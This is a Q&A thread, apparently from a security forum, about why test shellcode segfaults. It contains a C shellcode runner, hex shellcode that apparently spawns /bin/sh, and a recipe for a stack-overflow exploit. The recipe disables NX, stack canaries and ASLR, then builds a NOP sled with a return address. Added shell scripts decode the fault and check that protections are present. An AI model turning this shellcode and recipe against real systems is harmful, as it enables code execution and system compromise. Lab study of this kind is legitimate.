Shellcode not running

Question
I've tried to run a lot of shellcodes via a C program to test them. Here it is:
    #include <stdio.h>
    #include <string.h>

    /* the shellcode bytes go here */
    unsigned char code[] = "shell here";

    int main(void)
    {
        printf("Shellcode Length: %zu\n", strlen((char *)code));
        /* treat the byte array as a function and jump into it */
        int (*ret)(void) = (int (*)(void))code;
        ret();
        return 0;
    }
And here's an example of a shellcode:
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
    "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
    "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
    "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    "\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42"
(incat etcshadow) After running

    gcc sctest.c -o out
    ./out
it just gives me the shellcode length and a Segmentation Fault. I've already tried a lot of different shellcodes but everything just gives me a segfault. My dmesg | tail -1:

    [18440.783383] test[8768]: segfault at 8049700 ip 08049700 sp bffff2ec error 15 in test[8049000+1000]

What's wrong with my shellcodes?
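The dmesg record in the question says more than "segfault" if the error field is decoded. The following is an added example, not code from the question or its answer: a POSIX shell function that decodes the page-fault error code the Linux x86 fault handler prints after "error" (printed in hex, so "error 15" is 0x15), using the CPU's error-code bits (1 = page present / protection violation, 2 = write, 4 = user mode, 8 = reserved bit, 16 = instruction fetch). The sample records are constructed from the line quoted above.

```shell
# Added example (not from the original question): decode the "error N"
# field of an x86 segfault record from dmesg. The kernel prints N with
# "%lx", so it is hex. Bits of the CPU page-fault error code:
#   1 = page present (protection violation), 2 = write, 4 = user mode,
#   8 = reserved PTE bit, 16 = instruction fetch.
decode_segfault() {
    line="$1"
    addr=$(printf '%s\n' "$line" | sed -n 's/.*segfault at \([0-9a-fA-F]*\).*/\1/p')
    ip=$(printf '%s\n' "$line" | sed -n 's/.* ip \([0-9a-fA-F]*\).*/\1/p')
    err=$(printf '%s\n' "$line" | sed -n 's/.* error \([0-9a-fA-F]*\).*/\1/p')
    if [ -z "$err" ]; then
        echo "not a segfault record"
        return 1
    fi
    code=$((0x$err))
    if [ $((code & 1)) -ne 0 ]; then
        out="protection violation on a present page"
    else
        out="page not present"
    fi
    if [ $((code & 16)) -ne 0 ]; then
        out="$out, instruction fetch"
    elif [ $((code & 2)) -ne 0 ]; then
        out="$out, write"
    else
        out="$out, read"
    fi
    if [ $((code & 4)) -ne 0 ]; then
        out="$out, user mode"
    else
        out="$out, kernel mode"
    fi
    if [ $((code & 8)) -ne 0 ]; then
        out="$out, reserved bit set"
    fi
    # If the faulting address is the instruction pointer itself, the CPU
    # was fetching an instruction from that address when it faulted.
    if [ -n "$addr" ] && [ -n "$ip" ] && [ $((0x$addr)) -eq $((0x$ip)) ]; then
        out="$out; fault address equals ip"
    fi
    echo "$out"
}

# Constructed sample: the record quoted in the question.
decode_segfault '[18440.783383] test[8768]: segfault at 8049700 ip 08049700 sp bffff2ec error 15 in test[8049000+1000]'
```

For the record in the question this reports a protection violation on a present page during an instruction fetch in user mode, with the fault address equal to eip: the jump into `code[]` happened, but the data segment the array lives in is mapped non-executable, which is exactly the protection the accepted answer switches off with -z execstack.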
Answer
After disabling the NX bit and other things like randomize_va_space, I've finally done it.
Firstly you should compile your executable with the flags -z execstack and -fno-stack-protector.
After that disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space. Now you have to find a shellcode. You can try msfpayload or msfvenom. Shellcode is bytecode which usually gives you a shell.
At that step you should find the offset for your stack overflow. You can try to find lines like
    sub hex-offset, %esp
Or you can try to bruteforce it with a simple script like

    python -c "print('A'*n)" | ./your_binary

where n is your offset.
After finding the offset (a SEGFAULT occurs and dmesg | tail -1 says that %eip is 0x41414141) you just need to write your exploit. Its structure looks like this:
    NOPs(no operation)*x + shellcode + return-address(4 bytes)*y

    len(shellcode) + x + 4y = your offset

where the return address is the address of the place in the stack where your NOPs are located (the address of %esp which you see in gdb's info r before input).
And don't forget that an exploit which works in gdb won't work without gdb, because you need to add/subtract 36 bytes from your return address.
Finally you can exploit it:

    ./your_binary < exploit.bin
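The answer works by switching off two protections (the non-executable stack and ASLR) and the stack canary. A practitioner will want the opposite check on real builds: confirm those protections are actually present. The following is an added example, not code from the answer or from any project; it reads the GNU_STACK program header from `readelf -lW` output, looks for the `__stack_chk_fail` symbol in `readelf -sW` output, and interprets the randomize_va_space value. The readelf lines used at the bottom are constructed samples so the parsers can be exercised without compiling anything; `check_binary` is the hypothetical wrapper that runs them against a real file.

```shell
# Added example (not from the original answer): verify the protections the
# answer disables. Parsers take readelf output as text so they can be tested
# on constructed samples; check_binary runs them on a real ELF file.

# GNU_STACK program header: flags column "RW" means non-executable stack,
# "RWE" means the binary was linked with -z execstack.
stack_from_readelf() {
    flags=$(printf '%s\n' "$1" | awk '$1 == "GNU_STACK" { print $7; exit }')
    case "$flags" in
        *E*) echo "executable stack (GNU_STACK $flags): linked with -z execstack" ;;
        "")  echo "no GNU_STACK header: the x86 loader then defaults to an executable stack" ;;
        *)   echo "non-executable stack (GNU_STACK $flags)" ;;
    esac
}

# A binary compiled with stack protection imports __stack_chk_fail;
# -fno-stack-protector removes that reference.
canary_from_readelf() {
    if printf '%s\n' "$1" | grep -q '__stack_chk_fail'; then
        echo "stack canary present (__stack_chk_fail referenced)"
    else
        echo "no stack canary (__stack_chk_fail not referenced)"
    fi
}

# Meaning of /proc/sys/kernel/randomize_va_space.
aslr_from_value() {
    case "$1" in
        0) echo "ASLR off" ;;
        1) echo "ASLR on for stack, mmap and vdso, but not brk" ;;
        2) echo "ASLR fully on (stack, mmap, vdso, brk)" ;;
        *) echo "unknown randomize_va_space value: $1" ;;
    esac
}

# Hypothetical wrapper: run all three checks for a real binary on this host.
check_binary() {
    stack_from_readelf "$(readelf -lW "$1")"
    canary_from_readelf "$(readelf -sW "$1")"
    aslr_from_value "$(cat /proc/sys/kernel/randomize_va_space)"
}

# Constructed samples of the relevant readelf lines.
SAMPLE_EXECSTACK='  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10'
SAMPLE_NX='  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x10'
SAMPLE_SYMS='    12: 00000000     0 FUNC    GLOBAL DEFAULT  UND __stack_chk_fail@GLIBC_2.4 (2)'

stack_from_readelf "$SAMPLE_EXECSTACK"
stack_from_readelf "$SAMPLE_NX"
canary_from_readelf "$SAMPLE_SYMS"
aslr_from_value 2
```

On a binary built as the answer describes, `check_binary` reports an executable stack and no canary, and with the sysctl set to 0 it reports ASLR off; a hardened build should report the opposite on all three lines.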